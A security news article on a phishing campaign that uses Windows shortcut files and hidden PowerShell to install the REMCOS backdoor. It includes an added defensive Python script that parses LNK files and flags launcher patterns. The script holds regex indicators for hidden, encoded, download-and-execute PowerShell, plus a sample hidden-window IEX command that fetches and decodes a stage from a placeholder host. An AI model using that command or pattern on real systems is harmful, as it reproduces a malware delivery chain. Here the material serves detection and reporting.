New Attack Uses Windows Shortcut Files to Install REMCOS Backdoor

A new and deceptive multi-stage malware campaign has been identified by the Lat61 Threat Intelligence team at security firm Point Wild. The attack uses a clever technique involving malicious Windows Shortcut (LNK) files, which are simple pointers to a program or file, to deliver a dangerous remote-access trojan (RAT) known as REMCOS.
The research, led by Dr. Zulfikar Ramzan, the CTO of Point Wild, and shared with Hackread.com, reveals that the campaign starts with a seemingly harmless shortcut file, possibly attached to an email, with a filename like “ORDINE-DI-ACQUIST-7263535.”
When a user clicks on it, the LNK file discreetly runs a PowerShell command in the background. For your information, PowerShell is a powerful command-line tool Windows uses for task automation; in this attack, however, it is used to download and decode a hidden payload.
This command is designed to download and decode a hidden payload without triggering security alerts, saving any files, or using macros. The research provides specific file hashes for this LNK file, including MD5: ae8066bd5a66ce22f6a91bd935d4eee6, to help in detection.
This campaign is designed to be stealthy by using a few different layers of disguise. After the initial PowerShell command runs, it fetches a Base64-encoded payload from a remote server. This is a common way to hide malicious code in plain sight, as Base64 is a standard method for encoding binary data into text.
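The two layers described so far, a shortcut whose embedded command line launches PowerShell and a Base64-encoded stage fetched by that command, are both things a defender can pull apart statically before anything runs. The script below is an added example, not code from Point Wild or from the Hackread report: it parses the ShellLink header and StringData of a .lnk file to recover the target path and arguments, decodes a `-EncodedCommand` blob if one is present, and flags the download-and-decode pattern. The file layout follows the published MS-SHLLINK format; the indicator regexes, the scoring threshold and the sample shortcut (built in memory with a placeholder `example.invalid` URL) are constructed for the demonstration and are assumptions, not indicators taken from the campaign.

```python
"""Static triage of Windows .lnk files: recover the embedded command line and
flag PowerShell download-and-decode launchers. Added example; MS-SHLLINK layout,
constructed indicators and a constructed sample fixture."""
import base64
import re
import struct
from typing import Optional

LNK_HEADER_SIZE = 0x4C
# Fixed CLSID 00021401-0000-0000-C000-000000000046 that every ShellLink carries
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x04, 0x08, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80

# StringData fields appear in this order when their flag is set
STRING_FIELDS = (
    (HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)

# Constructed indicator set: tokens that together characterise a fileless launcher
INDICATORS = {
    "powershell": r"powershell|pwsh",
    "hidden_window": r"-w(?:indowstyle)?\s+hidden",
    "encoded_command": r"-e(?:nc|ncodedcommand|c)?\s+[A-Za-z0-9+/=]{16,}",
    "download": r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient",
    "base64_decode": r"frombase64string",
    "in_memory_exec": r"\biex\b|invoke-expression",
}


def parse_lnk(data: bytes) -> dict:
    """Parse header + StringData of a ShellLink, skipping IDList and LinkInfo."""
    if len(data) < LNK_HEADER_SIZE:
        raise ValueError("file shorter than a ShellLink header")
    header_size, = struct.unpack_from("<I", data, 0)
    if header_size != LNK_HEADER_SIZE or data[4:20] != LNK_CLSID:
        raise ValueError("not a ShellLink (bad HeaderSize or CLSID)")
    flags, = struct.unpack_from("<I", data, 0x14)
    pos = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:      # IDListSize (2 bytes) + IDList body
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                # LinkInfoSize counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    result = {"flags": flags}
    for bit, name in STRING_FIELDS:
        if not flags & bit:
            continue
        count, = struct.unpack_from("<H", data, pos)   # CountCharacters, not bytes
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + count * width]
        pos += count * width
        result[name] = raw.decode("utf-16-le" if width == 2 else "cp1252", "replace")
    return result


def decode_encoded_command(args: str) -> Optional[str]:
    """Return the UTF-16LE plaintext behind a -EncodedCommand blob, if any."""
    m = re.search(INDICATORS["encoded_command"], args, re.IGNORECASE)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(0).split()[-1], validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(command_line: str) -> dict:
    """Score a command line (from an LNK or a process-creation log) against INDICATORS."""
    decoded = decode_encoded_command(command_line)
    text = command_line + (" " + decoded if decoded else "")   # inspect the inner layer too
    hits = sorted(k for k, pat in INDICATORS.items() if re.search(pat, text, re.IGNORECASE))
    return {"indicators": hits, "decoded_command": decoded,
            "verdict": "suspicious" if len(hits) >= 3 else "benign"}


def scan_lnk(data: bytes) -> dict:
    link = parse_lnk(data)
    return {**link, **triage(link.get("relative_path", "") + " " + link.get("arguments", ""))}


def build_sample_lnk(target: str, arguments: str) -> bytes:
    """Constructed fixture: minimal Unicode ShellLink with RelativePath and Arguments only."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I", LNK_HEADER_SIZE) + LNK_CLSID + struct.pack("<I", flags)
    header = header.ljust(LNK_HEADER_SIZE, b"\0")        # remaining header fields zeroed
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le") for s in (target, arguments))
    return header + body


# Constructed sample mirroring the described chain; example.invalid never resolves.
STAGE2 = ("IEX([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("
          "(New-Object Net.WebClient).DownloadString('http://example.invalid/stage2'))))")
SAMPLE_LNK = build_sample_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "-w hidden -nop -ep bypass -enc " + base64.b64encode(STAGE2.encode("utf-16-le")).decode(),
)

if __name__ == "__main__":
    for key, value in scan_lnk(SAMPLE_LNK).items():
        print(f"{key}: {value}")
```

Run against a directory of quarantined shortcuts, the `relative_path`/`arguments` pair is what to triage: a shortcut pointing at `powershell.exe` with a hidden window and an encoded or downloading command line is not how legitimate shortcuts are built, and decoding the `-enc` layer exposes the fetch URL, which is the indicator worth blocking at the proxy. The threshold of three indicators is deliberately conservative; tune it to your environment.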
Once the payload is downloaded and decoded, it is launched as a Program Information File, or .PIF file, which is a type of executable often used for older programs. The attackers disguised this file as CHROME.PIF, mimicking a legitimate program.
This final step installs the REMCOS backdoor, giving attackers full control of the compromised system. The malware also ensures its persistence on the system by creating a log file for its keystroke recording in a new Remcos folder under the %ProgramData% directory.
Once installed, the REMCOS backdoor grants the attackers extensive control over the victim’s computer. The threat intelligence report notes that it can perform a wide range of malicious activities, including keylogging to steal passwords, creating a remote shell for direct access, and gaining access to files.
Furthermore, the REMCOS backdoor allows the attackers to control the computer’s webcam and microphone, enabling them to spy on the user. The research also revealed that the command and control (C2) infrastructure for this specific campaign is hosted in Romania and the US.
This finding highlights the need for caution, as these attacks can originate from anywhere in the world. Researchers recommend that users stay cautious with shortcut files from untrusted sources, double-check attachments before opening them, and use updated antivirus software with real-time protection.
HackRead